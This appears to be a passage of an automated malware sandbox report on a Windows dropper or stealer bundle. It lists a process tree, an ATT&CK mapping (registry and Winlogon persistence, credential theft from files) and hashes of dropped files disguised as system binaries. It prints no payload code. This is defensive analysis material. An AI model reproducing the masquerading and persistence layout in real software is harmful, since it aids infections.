C:\Users\Admin\AppData\Local\Temp\svhost
C:\Users\Admin\AppData\Local\Temp\svhost
1⤵
PID:2520

C:\Users\Admin\AppData\Local\Temp\svhost
C:\Users\Admin\AppData\Local\Temp\svhost
1⤵
PID:1832

C:\Users\Admin\AppData\Local\Temp\svhost
C:\Users\Admin\AppData\Local\Temp\svhost
1⤵
PID:3164

C:\Users\Admin\AppData\Local\Temp\svhost
C:\Users\Admin\AppData\Local\Temp\svhost
1⤵
PID:4444

C:\Users\Admin\AppData\Local\Temp\svhost
C:\Users\Admin\AppData\Local\Temp\svhost
1⤵
PID:1308

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Replication Through Removable Media

T1091

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Replication Through Removable Media

T1091

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d42b6da621e8df5674e26b799c8e2aa

SHA1
ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

SHA256
5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

SHA512
53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
e243a38635ff9a06c87c2a61a2200656

SHA1
ecd95ed5bf1a9fbe96a8448fc2814a0210fa2afc

SHA256
af5782703f3f2d5a29fb313dae6680a64134db26064d4a321a3f23b75f6ca00f

SHA512
4418957a1b10eee44cf270c81816ae707352411c4f5ac14b6b61ab537c91480e24e0a0a2c276a6291081b4984c123cf673a45dcedb0ceeef682054ba0fc19cb4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
a9a9b8c327fc89d4b2e03cf7d8f0cca4

SHA1
b31953075db379e188400242985db5672df9e4ad

SHA256
8fdb37310ee7035cab6966aad39c8db7d0e5bc117e0b5f0fa97aff8cbcc4a1ce

SHA512
a6bd79b3fdaba75408091629d0b6bc306a01b4701bddb87101b5259f15b7805fd45248a7ca90172062cf8bf207e2117a25099ceeede7a15b0ad762c75f27a7c7

Download Submit
C:\Users\Admin\AppData\Local\Temp\Built.exe

Filesize
1.2MB

MD5
7333f523fb480e2509e6ca733faba940

SHA1
f19307c6ee8fb04f504a3bafcf26872586d5a13a

SHA256
bdae60da6027818673072070a918a52d87f5be3c703c795dc3d83c5c27d67b57

SHA512
63de9cd8337e7c185f93f6f04635149e71f4eb6661f74a1eee40ac7729d4c6ec54d4cea643e864e243c8bddd9cb260df95095a1da1cdaafdfbdb564d257b2c3d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Built.exe

Filesize
1.2MB

MD5
9eaef937ccdbb0d61718b7ca7e3e9f2e

SHA1
f014300e1e4acd6a06863828e42a9ec67f937f20

SHA256
204cfc76a15ba9baab95a2ac137bdf2778df53610908e8336b6618151f4e452e

SHA512
3ff3ec85c8506a90ea8d5fcc64ae69d59db448e9e7bedb10f60fcb71d9b15d38ee921fa591f0a10fd8c4d50f405d2679838eea9df01e86538a54b9cad413f4bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\Built.exe

Filesize
1024KB

MD5
2896bddda2f5423ea8e5e2b7bcc3f2ec

SHA1
48789a6849cf1e8ca7507d5f671c8329cd78d614

SHA256
c96bff1db5f5642faad140751c18a140f75bc685f2328af174b2443c9ee7fcf3

SHA512
106ea8bb0e195dc6ff2b3d6c955d71cd9c754570b2fb9cf2020babcf9e3eb9f63e1ff34f700239330c42a4569ec9e48c21834c7de5bf4fddefde6f53885228c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\Built.exe

Filesize
704KB

MD5
951a25061481de5dee09a8a189aa53eb

SHA1
8daecf2a75de850e3167d807a9253f9c3ac2d40c

SHA256
608b27db6cac53010dfd1c1a18d286a54e9df2f3760472174df87559e8a47257

SHA512
555c854657e338654911e1cf37fcd0df22b839b8a8d03228b84a8745db230a4ef7f46c3f7b784a3dac134ef2baf20a54cce48f3ab4c165ab0740aa1ca781dd92

Download Submit
C:\Users\Admin\AppData\Local\Temp\Installer.exe

Filesize
896KB

MD5
060acc0ae737f0a8118434a538023a90

SHA1
df2b5888eb3b50b31848e36728d0a18649b6454c

SHA256
9e4661dfd9f9a2a883cd85630466d5806924097a986084805c1e5f7c5e513f72

SHA512
e73ea00ac5650e9e18ba23fe39ad45b87881682f01f87481e30eedffd336052f75447c44b01885251fa1b9f1f4b05ebf7deecb1cdc00817752edfac729fe9fda

Download Submit
C:\Users\Admin\AppData\Local\Temp\Installer.exe

Filesize
320KB

MD5
2a61e5f0cadd92ea69cf7a5a22481566

SHA1
55477bbe2d24e65734a31a002310c0a2cc0bc760

SHA256
f1074debce7ca79ae9f6993444580c4c5f34d37f4546182873f4b28af89f0e10

SHA512
99fdbacb1b4bb1917b37db65cc07402ccbb27a99a93ef0116ca40308eec16b4e5900d98b8c40ad348fbbd8044681ef1b67cacf3999cc036802cdb35ba2bb19fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\Installer.exe

Filesize
2.4MB

MD5
68a116880728b77f51ab407eddd437ad

SHA1
421dbac9b6a10d283c390e4a70bd6e1bdbaa39ab

SHA256
2feeff13d9d3b5594411fe20b77986be8ce0cfd4286c70910c7aadb6714b348c

SHA512
95a495b5f7947e03565a048fc42237bd68912b8ee0f074159b9b26480e814344f42344cadf75a1d3bf2a85e2a9b34fba2f5f1475f576a816849beaa7af8ca5da

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\hui.exe

Filesize
5KB

MD5
17b935ed6066732a76bed69867702e4b

SHA1
23f28e3374f9d0e03d45843b28468aace138e71c

SHA256
e60353b37f785c77e1063ac44cba792e9ec69f27b1dc9f3b719280d5ce015cc0

SHA512
774ea047cdc5f008df03ad67242df04d630bb962bc99f1ea8974a21baf6a902c7a5d8b8d09d9e5c7d7e46b0378c7baf33bf80fb3e34777cd0958b8fc740d0318

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31802\VCRUNTIME140.dll

Filesize
106KB

MD5
49c96cecda5c6c660a107d378fdfc3d4

SHA1
00149b7a66723e3f0310f139489fe172f818ca8e

SHA256
69320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc

SHA512
e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31802\_bz2.pyd

Filesize
48KB

MD5
c413931b63def8c71374d7826fbf3ab4

SHA1
8b93087be080734db3399dc415cc5c875de857e2

SHA256
17bfa656cabf7ef75741003497a1c315b10237805ff171d44625a04c16532293

SHA512
7dc45e7e5ed35cc182de11a1b08c066918920a6879ff8e37b6bfbdd7d40bffa39ea4aca778aa8afb99c81a365c51187db046bceb938ce9ace0596f1cf746474f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31802\_ctypes.pyd

Filesize
58KB

MD5
00f75daaa7f8a897f2a330e00fad78ac

SHA1
44aec43e5f8f1282989b14c4e3bd238c45d6e334

SHA256
9ffadcb2c40ae6b67ab611acc09e050bbe544672cf05e8402a7aa3936326de1f

SHA512
f222f0ebf16a5c6d16aa2fba933034e692e26e81fea4d8b008259aff4102fe8acf3807f3b016c24002daa15bb8778d7fef20f4ae1206d5a6e226f7336d4da5d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31802\_decimal.pyd

Filesize
106KB

MD5
e3fb8bf23d857b1eb860923ccc47baa5

SHA1
46e9d5f746c047e1b2fefaaf8d3ec0f2c56c42f0

SHA256
7da13df1f416d3ffd32843c895948e460af4dc02cf05c521909555061ed108e3

SHA512
7b0a1fc00c14575b8f415fadc2078bebd157830887dc5b0c4414c8edfaf9fc4a65f58e5cceced11252ade4e627bf17979db397f4f0def9a908efb2eb68cd645c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31802\_hashlib.pyd

Filesize
35KB

MD5
b227bf5d9fec25e2b36d416ccd943ca3

SHA1
4fae06f24a1b61e6594747ec934cbf06e7ec3773

SHA256
d42c3550e58b9aa34d58f709dc65dc4ee6eea83b651740822e10b0aa051df1d7

SHA512
c6d7c5a966c229c4c7042ef60015e3333dab86f83c230c97b8b1042231fdb2a581285a5a08c33ad0864c6bd82f5a3298964ab317736af8a43e7caa7669298c3e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31802\_lzma.pyd

Filesize
85KB

MD5
542eab18252d569c8abef7c58d303547

SHA1
05eff580466553f4687ae43acba8db3757c08151

SHA256
d2a7111feeaacac8b3a71727482565c46141cc7a5a3d837d8349166bea5054c9

SHA512
b7897b82f1aa9d5aa895c3de810dab1aa335fdf7223e4ff29b32340ad350d9be6b145f95a71c7bc7c88c8df77c3f04853ae4d6f0d5a289721fc1468ecba3f958

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31802\_queue.pyd

Filesize
25KB

MD5
347d6a8c2d48003301032546c140c145

SHA1
1a3eb60ad4f3da882a3fd1e4248662f21bd34193

SHA256
e71803913b57c49f4ce3416ec15dc8a9e5c14f8675209624e76cd71b0319b192

SHA512
b1fdb46b80bb4a39513685781d563a7d55377e43e071901930a13c3e852d0042a5302cd238ddf6ea4d35ceee5a613c96996bffad2da3862673a0d27e60ff2c06

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31802\_socket.pyd

Filesize
43KB

MD5
1a34253aa7c77f9534561dc66ac5cf49

SHA1
fcd5e952f8038a16da6c3092183188d997e32fb9

SHA256
dc03d32f681634e682b02e9a60fdfce420db9f26754aefb9a58654a064dc0f9f

SHA512
ff9eeb4ede4b4dd75c67fab30d0dec462b8af9ca6adc1dcae58f0d169c55a98d85bb610b157f17077b8854ec15af4dfab2f0d47fa9bc463e5b2449979a50293a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31802\_sqlite3.pyd

Filesize
56KB

MD5
1a8fdc36f7138edcc84ee506c5ec9b92

SHA1
e5e2da357fe50a0927300e05c26a75267429db28

SHA256
8e4b9da9c95915e864c89856e2d7671cd888028578a623e761aeac2feca04882

SHA512
462a8f995afc4cf0e041515f0f68600dfd0b0b1402be7945d60e2157ffd4e476cf2ae9cdc8df9595f0fe876994182e3e43773785f79b20c6df08c8a8c47fffa0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31802\_ssl.pyd

Filesize
65KB

MD5
f9cc7385b4617df1ddf030f594f37323

SHA1
ebceec12e43bee669f586919a928a1fd93e23a97

SHA256
b093aa2e84a30790abeee82cf32a7c2209978d862451f1e0b0786c4d22833cb6

SHA512
3f362c8a7542212d455f1f187e24f63c6190e564ade0f24561e7e20375a1f15eb36bd8dce9fdaafdab1d6b348a1c6f7cddb9016e4f3535b49136550bc23454fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31802\blank.aes

Filesize
121KB

MD5
4e3e1d66c510b4330e1b3bc7772b973b

SHA1
280077f6dadc9319585b53991543bf883421571b

SHA256
31554d3b466fd69eaadbea7dea22162ed17a950cc4709470fb1b25eae8c44a95

SHA512
939613834da2ff14574f7bfdd84c48b81773e61f9ad6492470698feb137775fe06ef6d96033bafafe8f68764dda4f3d61863ba58c17bcaf3fb09f263ff550beb

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31802\blank.aes

Filesize
121KB

MD5
19be4a8c750cb99e7a8b358231c275e2

SHA1
4d4ae88f491d1d08e5f36afe3fa01de7aef8ea70

SHA256
b55a2fa6de422c1f9557b3637e83f688c885e4f3f5ae4be06d1d331c3df3bb16

SHA512
831e79d86fac100b52a49c0d4317677a69659a03b85e126aab8d35b79fe1781e6705b7993ac2b5d5be617631e6bb4a28e48b7cf87d9d104312e3ed8eb2ee7b79

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31802\libcrypto-3.dll

Filesize
1.6MB

MD5
78ebd9cb6709d939e4e0f2a6bbb80da9

SHA1
ea5d7307e781bc1fa0a2d098472e6ea639d87b73

SHA256
6a8c458e3d96f8dd3bf6d3cacc035e38edf7f127eee5563b51f8c8790ced0b3e

SHA512
b752769b3de4b78905b0326b5270091642ac89ff204e9e4d78670791a1fa211a54d777aeef59776c21f854c263add163adaef6a81b166190518cfaaf4e2e4122

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31802\libcrypto-3.dll

Filesize
1.3MB

MD5
81e6a09354109f8a6df5f617154ff167

SHA1
dae1500e8b47bbdac303801628209846202a2940

SHA256
136a898e0ebd373c3fe98ced299ecc364d8a756ac7e9cd3bae766ff96f817c7e

SHA512
18fc40e9cf475c79fc77938dd0d838cddbdebf25e83b387b7c383f08250e9204e9651c3d544df56f2adee39a3cd29b3f52caab705e4c93292fc8e12d1d2c6bf9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31802\libffi-8.dll

Filesize
29KB

MD5
08b000c3d990bc018fcb91a1e175e06e

SHA1
bd0ce09bb3414d11c91316113c2becfff0862d0d

SHA256
135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

SHA512
8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31802\libssl-3.dll

Filesize
223KB

MD5
bf4a722ae2eae985bacc9d2117d90a6f

SHA1
3e29de32176d695d49c6b227ffd19b54abb521ef

SHA256
827fdb184fdcde9223d09274be780fe4fe8518c15c8fc217748ad5fd5ea0f147

SHA512
dd83b95967582152c7b5581121e6b69a07073e7a76fe87975742bb0fd7ecef7494ec940dba914364034cc4e3f623be98cc887677b65c208f14a2a9fc7497ca73

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31802\python311.dll

Filesize
768KB

MD5
8ef63857dbb5d6ae8a463a814ae9e411

SHA1
d68fccd41ea40904d0fa0ee99e36b00eafd7fe5d

SHA256
60bdaddca430089191296f1e8792ae815267a479f14ad0692590084533c68218

SHA512
c1eb1eade722ca45495c777cc8e6bb81aae2e10c9f7f1329c2f8df520e639f215748f675d1c5123de3a8270932102eb909c03c5c0d586008ff827268920951dc

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31802\python311.dll

Filesize
704KB

MD5
98908290c617f43d354336574581a24d

SHA1
c7b6ac8fced5fd95e1b4e03239eb29704a33440f

SHA256
d3e5d067ca53538dc7b916bcb934fd7ce23ce8a63f8216e4504158a395b79876

SHA512
6443ccff7d5e283c86c1ece59109d67fd724eebb998f5b6deb7f9776b3d15ff06b45e433aac54b60309c0e22b66f220cadf690dafb081bd602736f794bec252e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31802\rar.exe

Filesize
615KB

MD5
9c223575ae5b9544bc3d69ac6364f75e

SHA1
8a1cb5ee02c742e937febc57609ac312247ba386

SHA256
90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

SHA512
57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31802\rarreg.key

Filesize
456B

MD5
4531984cad7dacf24c086830068c4abe

SHA1
fa7c8c46677af01a83cf652ef30ba39b2aae14c3

SHA256
58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

SHA512
00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31802\select.pyd

Filesize
25KB

MD5
45d5a749e3cd3c2de26a855b582373f6

SHA1
90bb8ac4495f239c07ec2090b935628a320b31fc

SHA256
2d15c2f311528440aa29934920fb0b015eaf8cbe3b3c9ad08a282a2d6ba68876

SHA512
c7a641d475a26712652a84b8423155ca347e0ec0155bd257c200225a64752453e4763b8885d8fb043b30e92ae023a501fff04777ba5cfe54da9a68071f25fbea

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31802\sqlite3.dll

Filesize
622KB

MD5
dbc64142944210671cca9d449dab62e6

SHA1
a2a2098b04b1205ba221244be43b88d90688334c

SHA256
6e6b6f7df961c119692f6c1810fbfb7d40219ea4e5b2a98c413424cf02dce16c

SHA512
3bff546482b87190bb2a499204ab691532aa6f4b4463ab5c462574fc3583f9fc023c1147d84d76663e47292c2ffc1ed1cb11bdb03190e13b6aa432a1cef85c4b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI31802\unicodedata.pyd

Filesize
295KB

MD5
8c42fcc013a1820f82667188e77be22d

SHA1
fba7e4e0f86619aaf2868cedd72149e56a5a87d4

SHA256
0e00b0e896457ecdc6ef85a8989888ccfbf05ebd8d8a1c493946a2f224b880c2

SHA512
3a028443747d04d05fdd3982bb18c52d1afee2915a90275264bf5db201bd4612090914c7568f870f0af7dfee850c554b3fec9d387334d53d03da6426601942b4

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kvg3asrh.hxp.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\bsypqh.exe

Filesize
323KB

MD5
c76b0867436829232609a7f6c786c37c

SHA1
06d88a277a77db9494feca72c31a35af3f83a4f8

SHA256
3c399e4c4826de5f378e1da9a9e54c29bf8d557aae01f53d307c4bf565d03194

SHA512
9047a8ac3a2795c73e5650ce37d0595798532579ca4013f2498e9641796d9814aba1d138812ee28135edd4b48843f58063c278511c4279ee3afbd422a683359d

Download Submit
C:\Users\Admin\AppData\Local\Temp\huii.exe

Filesize
313KB

MD5
c125391f5a989f964548e45decc7490e

SHA1
08906a336b65dbb61cfc0b95f11315f18a5301f8

SHA256
acc6fecd839b1de178b5d17525b3764fb7511e589ae04f6217666e869cacce91

SHA512
9a6b36c78b9016f662124f4761d4ad42965748259fba7f8fc59730d0fbd63b151ff34b650019645fe845659ea024e9a9f173c55427aced781b5e5a6938b8dd3d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ms_host.exe

Filesize
60KB

MD5
d5a10d43ab7ebb2eb3994d838f28082c

SHA1
e14038fa3d5d9f87e5f58afe4299453764570c7e

SHA256
3d30447bf5ff5d6a9a4bcb0d10a1247d75f015e93b90cc4c5278100e4b7f8e94

SHA512
e814c1dfabe7ce1d7e7f986d2319332442b69bb20c8c6c323f828a61cbae35653f5bacc1b336b06b4c74c6ff156e1c91e78be12e6e3428fbec2084046d6f9add

Download Submit
C:\Users\Admin\AppData\Local\Temp\sv_host.exe

Filesize
69KB

MD5
91d589dde2c5210749d269da8d49f9b2

SHA1
3c712db908c457dcf2fcfe76979128aa35db41f2

SHA256
8cbdd9f6000ae1b2e8092c0fc6e283da34271c83bfd564198e779c3a1f417635

SHA512
1913ff1143bdadbd90e6e4da5dc803b4d405cb6a6b767eda33ba58509cfbde6a9638be8582f7faaabacdbeae327086340b735eb0db078b0a28a05b01e7389c69

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost.exe

Filesize
603KB

MD5
e7622f5a26365bbc2a1902866be391cb

SHA1
3fd6d9e885c99374f48887a26ea8abcd5655448c

SHA256
4d299acbd0e5643196dbb88796d22649bfe9d97f720925a4863e1ed966f65681

SHA512
43109c9cb0dee73333e0d9c7d432e05803b96fe6bfa5dc3a2a255f1c6b52c966d30d61553338a1f71b0fda18912cde0d22387452b802669f05a58376d3e4bf6d

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp8C13.tmp.bat

Filesize
156B

MD5
ede93ace592849c8bf16424c15ed525c

SHA1
4964297117fed9a8ba7761b293c8a340f0f48881

SHA256
8149dc6d1ec3eab377d6af646c287845b47aebf24417706102d3b120826bc7ad

SHA512
d7e73b159ba6e10eca853343650d51786d6ce9acd882e8b97ce7cbe62b3b03682d49420024289d073d0ba4e9b263b9f6c8f08c7cb15d89175d8f8249e4a83834

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpA9BD.tmp.bat

Filesize
169B

MD5
34ca2ef0b49b789982f8ec36e6439c0f

SHA1
df94d167953f7135a2f8046d5ef1ffc0b1579e01

SHA256
68d50a3fd04f133d2d78c6b0ed248beb8239ee759ebe515e2b49fb3dbb7e25d0

SHA512
9dd1abe42552f46786638c5cc79a7d3536ca4d94546184a6f80f2a9680f5e5347349c8eeb10a35f13ad0239ee7c3e8f4ec8f8ae67bae1fb1f8eabe04ca47bd35

Download Submit
C:\Users\Admin\AppData\Local\Temp\watchdog.vbs

Filesize
154B

MD5
708b249a9687f18684fd4b7f6d79a725

SHA1
b6a74dd71ff3119c7d0f09538305a811901c468a

SHA256
67867c598a29cc4aabfbb7461d2d0f3b946dbf792ef0c2b8bd39775f2c5e344b

SHA512
7f833139506db626c4ddf06d2f7643668f7ec4009d19d15bff03e3ca7897acfe7fc43a61b455b62b148a97afb8bef87ff05a37b00a259664c2ba66fa3cbee346

Download Submit
C:\Users\Admin\AppData\Local\Temp\watchdog.vbs.bat

Filesize
146B

MD5
a9d2fc52c32f82335d453b70f1d02c0e

SHA1
0c26c7ed464426b557a799a1fc141141acc53b49

SHA256
e7c0ab7bb5ab69801155583f7a47fe3ba60baea95b8c2171c19e54a338fa8106

SHA512
a347f1212a9088c48b09ff6cb2a95259dc438a5767a918451baf302f3e2bd2a66036d4f44ef543128af36206d354bdeb3431c27ec43568b8e949b99c1f1f8e8a

Download Submit
C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe

Filesize
448KB

MD5
bdc0fc247189ee2c6a65667725ebbe2c

SHA1
a1e8719c0df3c5d31d04c1eed9aa3a7c262190be

SHA256
6a48a8618f8466bd223c2965387f8531155b7083833535aff8981e04fde9b44b

SHA512
79c52987f4e390dd49e2940a61848ba43ba930fbd136121db245b995c75ec05137284cb5e425342344a53ee26d1c024f4bdaf673b216067fe55944ce28ee12e5

Download Submit
C:\Users\Admin\AppData\Roaming\svchost\svchosl.exe

Filesize
576KB

MD5
be06dc0286d211a63f7ee511867c08b8

SHA1
4fa64867fbcb6ca46dd8287224c9f21ddf4de933

SHA256
997c7b1e09bbf5dc1fcd7ccc55285aa704a6b36c0ef4178757109105ca68c0bc

SHA512
364a82d37c7e310f5c04f29299972afb4f1afba7848c84764657dc4090951eb0b4edb4ee5ebd68092dfb7deb5394a88381b1de06f2cda4a58618d3aa98412157

Download Submit
C:\Windows\xdwd.dll

Filesize
128KB

MD5
1f5f7177bfc7e8811a66fb2414cf3b66

SHA1
2ef8725f9303f65034b29ab71f24f6731373a7b3

SHA256
805c927ac666f9bccf4f03f96c7be0119abfaa0cacf369d5aedf67f0402baeeb

SHA512
a98eb3d0c38e010dec630a83ee1243184594d8674382795a8be59246d5d92a11b69a58b1926975f5781037fdefbf97a118c19f0b6ba4471f1d188e105eb583fa

Download Submit
memory/100-255-0x0000023CE3BC0000-0x0000023CE3BD0000-memory.dmp

Filesize
64KB

Download
memory/100-189-0x0000023CE3BC0000-0x0000023CE3BD0000-memory.dmp

Filesize
64KB

Download
memory/100-188-0x0000023CE3BC0000-0x0000023CE3BD0000-memory.dmp

Filesize
64KB

Download
memory/100-211-0x00007FF917C70000-0x00007FF918731000-memory.dmp

Filesize
10.8MB

Download
memory/100-266-0x0000023CE3BC0000-0x0000023CE3BD0000-memory.dmp

Filesize
64KB

Download
memory/852-251-0x0000000074780000-0x0000000074F30000-memory.dmp

Filesize
7.7MB

Download
memory/1104-5541-0x000001DC47D40000-0x000001DC47D50000-memory.dmp

Filesize
64KB

Download
memory/1104-5557-0x000001DC47E40000-0x000001DC47E50000-memory.dmp

Filesize
64KB

Download
memory/1948-97-0x00007FF917C70000-0x00007FF918731000-memory.dmp

Filesize
10.8MB

Download
memory/1948-260-0x00007FF917C70000-0x00007FF918731000-memory.dmp

Filesize
10.8MB

Download
memory/1948-90-0x0000000000410000-0x0000000000426000-memory.dmp

Filesize
88KB

Download
memory/2360-38-0x00007FF917C70000-0x00007FF918731000-memory.dmp

Filesize
10.8MB

Download
memory/2360-26-0x00000000005C0000-0x000000000065E000-memory.dmp

Filesize
632KB

Download
memory/2360-190-0x00007FF917C70000-0x00007FF918731000-memory.dmp

Filesize
10.8MB

Download
memory/2992-1101-0x0000000000400000-0x0000000000458000-memory.dmp

Filesize
352KB

Download
memory/2996-278-0x000001E2EB6B0000-0x000001E2EB6C0000-memory.dmp

Filesize
64KB

Download
memory/2996-277-0x00007FF917C70000-0x00007FF918731000-memory.dmp

Filesize
10.8MB

Download
memory/2996-279-0x000001E2EB6B0000-0x000001E2EB6C0000-memory.dmp

Filesize
64KB

Download
memory/3588-180-0x0000023F1AD30000-0x0000023F1B250000-memory.dmp

Filesize
5.1MB

Download
memory/3588-257-0x00007FF911A30000-0x00007FF911AFD000-memory.dmp

Filesize
820KB

Download
memory/3588-184-0x00007FF90D510000-0x00007FF90DA30000-memory.dmp

Filesize
5.1MB

Download
memory/3588-76-0x00007FF913E50000-0x00007FF914439000-memory.dmp

Filesize
5.9MB

Download
memory/3588-117-0x00007FF926FC0000-0x00007FF926FE3000-memory.dmp

Filesize
140KB

Download
memory/3588-163-0x00007FF911B00000-0x00007FF911B33000-memory.dmp

Filesize
204KB

Download
memory/3588-186-0x00007FF913E50000-0x00007FF914439000-memory.dmp

Filesize
5.9MB

Download
memory/3588-187-0x00007FF911400000-0x00007FF911414000-memory.dmp

Filesize
80KB

Download
memory/3588-181-0x00007FF914C00000-0x00007FF914C0D000-memory.dmp

Filesize
52KB

Download
memory/3588-119-0x00007FF926FB0000-0x00007FF926FBF000-memory.dmp

Filesize
60KB

Download
memory/3588-196-0x00007FF9112E0000-0x00007FF9113FC000-memory.dmp

Filesize
1.1MB

Download
memory/3588-165-0x00007FF911A30000-0x00007FF911AFD000-memory.dmp

Filesize
820KB

Download
memory/3588-238-0x00007FF911400000-0x00007FF911414000-memory.dmp

Filesize
80KB

Download
memory/3588-250-0x00007FF913C80000-0x00007FF913DF7000-memory.dmp

Filesize
1.5MB

Download
memory/3588-252-0x00007FF911B40000-0x00007FF911B59000-memory.dmp

Filesize
100KB

Download
memory/3588-160-0x00007FF911B40000-0x00007FF911B59000-memory.dmp

Filesize
100KB

Download
memory/3588-133-0x00007FF91DD00000-0x00007FF91DD2D000-memory.dmp

Filesize
180KB

Download
memory/3588-217-0x00007FF926FC0000-0x00007FF926FE3000-memory.dmp

Filesize
140KB

Download
memory/3588-213-0x00007FF913E50000-0x00007FF914439000-memory.dmp

Filesize
5.9MB

Download
memory/3588-136-0x00007FF914C10000-0x00007FF914C29000-memory.dmp

Filesize
100KB

Download
memory/3588-222-0x00007FF913E00000-0x00007FF913E23000-memory.dmp

Filesize
140KB

Download
memory/3588-233-0x00007FF911B40000-0x00007FF911B59000-memory.dmp

Filesize
100KB

Download
memory/3588-235-0x00007FF911B00000-0x00007FF911B33000-memory.dmp

Filesize
204KB

Download
memory/3588-236-0x00007FF911A30000-0x00007FF911AFD000-memory.dmp

Filesize
820KB

Download
memory/3588-239-0x00007FF914C00000-0x00007FF914C0D000-memory.dmp

Filesize
52KB

Download
memory/3588-240-0x00007FF913E50000-0x00007FF914439000-memory.dmp

Filesize
5.9MB

Download
memory/3588-241-0x00007FF9112E0000-0x00007FF9113FC000-memory.dmp

Filesize
1.1MB

Download
memory/3588-242-0x00007FF926FC0000-0x00007FF926FE3000-memory.dmp

Filesize
140KB

Download
